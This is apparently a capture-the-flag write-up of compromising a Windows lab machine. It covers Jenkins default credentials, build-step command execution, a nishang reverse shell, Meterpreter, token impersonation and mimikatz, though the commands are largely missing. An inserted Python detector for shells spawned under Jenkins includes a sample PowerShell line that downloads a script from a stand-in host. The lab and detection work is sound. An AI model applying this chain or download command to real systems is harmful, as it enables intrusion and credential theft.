Exploited Jenkins to gain an initial shell, then escalated privileges by exploiting Windows authentication tokens. Meterpreter was deployed with web_delivery.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Recon
Target: 10.10.230.14
Nmap scan:
Nmap all ports:
Open Port Review:
Port 80 - Microsoft IIS httpd 7.5 - webserver
image bruce.jpg and email exposed [email protected].
Port 3389 - Remote RDP
Port 8080 - Jetty 9.4.z-SNAPSHOT - webserver
login attempt with admin:admin enabled access to the backend.
version number exposed as Jenkins ver. 2.190.1
Jenkins searchsploit:
accessing console
discovered console:
Under the “Build” section of /job/project/configure, the “whoami” entry offers the ability to execute commands on the target system.
Reverse Shell
using nishang PowerShellTcp.ps1 to create a reverse shell:
Github Link: https://github.com/samratashok/nishang.git
creating webserver on local machine via python3
adding powershell command to console “Build” section:
Listener setup: rlwrap allows the arrow keys (up, down, left, right) to be used in the shell
Connection received:
Systeminfo
User.txt
located: C:\Users\bruce\desktop\user.txt
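Seen from the defender's side, the build-step command execution above shows up as a shell process somewhere below the Jenkins JVM. The following is an added example, not part of the original write-up: it walks process-creation events, tracks the Jenkins process tree, and flags shells in it, rating those whose command line references a remote URL as high. The event field names, the Jenkins install path, the PIDs and the 192.0.2.10 address are assumptions constructed for the example.

```python
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: the Jenkins JVM runs from a path containing a Jenkins directory; adjust to the real install.
JENKINS_RE = re.compile(r"\\jenkins\\(.*\\)?java\.exe$", re.I)
URL_RE = re.compile(r"https?://", re.I)

def triage(events):
    """Return (pid, severity, cmdline) for every shell started anywhere below Jenkins."""
    tree = set()    # PIDs known to descend from the Jenkins java process
    alerts = []
    for ev in events:                      # events must be oldest first
        if JENKINS_RE.search(ev["image"]):
            tree.add(ev["pid"])
            continue
        if ev["ppid"] not in tree:
            continue
        tree.add(ev["pid"])                # inherit ancestry so grandchildren are tracked
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name in SHELLS:
            severity = "high" if URL_RE.search(ev["cmdline"]) else "review"
            alerts.append((ev["pid"], severity, ev["cmdline"]))
    return alerts

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events (not taken from the target in this write-up).
SAMPLE = [
    {"pid": 100, "ppid": 4, "cmdline": "java -jar jenkins.war",
     "image": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"},
    {"pid": 200, "ppid": 100, "image": CMD, "cmdline": "cmd /c call build.bat"},
    {"pid": 201, "ppid": 200, "cmdline": "whoami",
     "image": r"C:\Windows\System32\whoami.exe"},
    {"pid": 300, "ppid": 100, "image": CMD, "cmdline": "cmd /c call build2.bat"},
    {"pid": 301, "ppid": 300, "image": PS,
     "cmdline": "powershell Invoke-WebRequest http://192.0.2.10:8000/a.ps1 -OutFile a.ps1"},
    {"pid": 400, "ppid": 50, "image": PS, "cmdline": "powershell Get-ChildItem"},
]

if __name__ == "__main__":
    for pid, severity, cmdline in triage(SAMPLE):
        print(f"[{severity}] pid={pid} {cmdline}")
```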
Upgrading shell to meterpreter shell
create payload with msfvenom
Setup multi/handler
Download revshell to target
Start process with:
(In my case meterpreter would hang and never fully connect to the handler. Moved to creating a meterpreter session with web_delivery.)
Creating Meterpreter shell via web_delivery
took the generated code and executed on target:
Migrate to higher process
elevated:
Windows User Impersonation
investigate privileges of bruce:
from this we are able to exploit the following, as they are enabled:
Load Incognito + List tokens within meterpreter
Impersonate token
root.txt
located at C:\Windows\System32\config
Post Exploitation
mimikatz extract